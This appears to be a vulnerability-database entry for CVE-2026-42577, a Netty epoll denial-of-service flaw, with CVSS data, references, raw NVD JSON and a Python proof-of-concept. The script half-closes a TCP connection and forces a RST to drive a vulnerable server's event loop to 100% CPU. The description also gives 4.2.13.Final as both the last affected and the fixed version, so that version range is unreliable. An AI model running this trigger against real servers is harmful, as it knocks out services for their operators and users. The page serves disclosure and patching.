CVE-2026-42577

Description

Netty is an asynchronous, event-driven network application framework. From 4.2.0.Final to 4.2.13.Final , Netty's epoll transport fails to detect and close TCP connections that receive a RST after being half-closed, leading to stale channels that are never cleaned up and, in some code paths, a 100% CPU busy-loop in the event loop thread. This vulnerability is fixed in 4.2.13.Final.

CVSS Details

CVSS Score

7.5

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

No configuration data available.

Netty 4.2.0.Final - 4.2.13.Final

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import socket
import struct

# Target IP and Port
TARGET_HOST = '127.0.0.1'
TARGET_PORT = 8080

def exploit():
    try:
        # 1. Establish TCP connection
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((TARGET_HOST, TARGET_PORT))
        
        # 2. Send data to simulate activity
        s.send(b"GET / HTTP/1.1\r\nHost: " + TARGET_HOST.encode() + b"\r\n\r\n")
        
        # 3. Half-close the connection (Send FIN)
        # This puts the socket in FIN-WAIT-2 or CLOSE-WAIT state depending on side
        s.shutdown(socket.SHUT_WR)
        
        # 4. Force send RST packet
        # Set SO_LINGER with l_onoff=1 and l_linger=0 to send RST on close
        linger_payload = struct.pack('ii', 1, 0)
        s.setsockopt(socket.SOL_SOCKET, socket.SO_LINGER, linger_payload)
        
        # 5. Close socket, triggering RST
        s.close()
        
        print(f"[+] Sent malicious packet sequence to {TARGET_HOST}:{TARGET_PORT}")
        print("[+] If vulnerable, the server CPU should spike.")
        
    except Exception as e:
        print(f"[-] Error: {e}")

if __name__ == "__main__":
    exploit()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-42577
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-42577
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-42577/
[4] VulDB https://vuldb.com/cve/CVE-2026-42577
[5] https://github.com/netty/netty/commit/0ec3d97fab376e243d328ac95fbd288ba0f6e22d
[6] https://github.com/netty/netty/pull/16689
[7] https://github.com/netty/netty/security/advisories/GHSA-rwm7-x88c-3g2p

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-42577", "sourceIdentifier": "[email protected]", "published": "2026-05-13T19:17:23.063", "lastModified": "2026-05-14T16:26:50.047", "vulnStatus": "Undergoing Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "Netty is an asynchronous, event-driven network application framework. From 4.2.0.Final to 4.2.13.Final , Netty's epoll transport fails to detect and close TCP connections that receive a RST after being half-closed, leading to stale channels that are never cleaned up and, in some code paths, a 100% CPU busy-loop in the event loop thread. This vulnerability is fixed in 4.2.13.Final."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-772"}]}], "references": [{"url": "https://github.com/netty/netty/commit/0ec3d97fab376e243d328ac95fbd288ba0f6e22d", "source": "[email protected]"}, {"url": "https://github.com/netty/netty/pull/16689", "source": "[email protected]"}, {"url": "https://github.com/netty/netty/security/advisories/GHSA-rwm7-x88c-3g2p", "source": "[email protected]"}]}}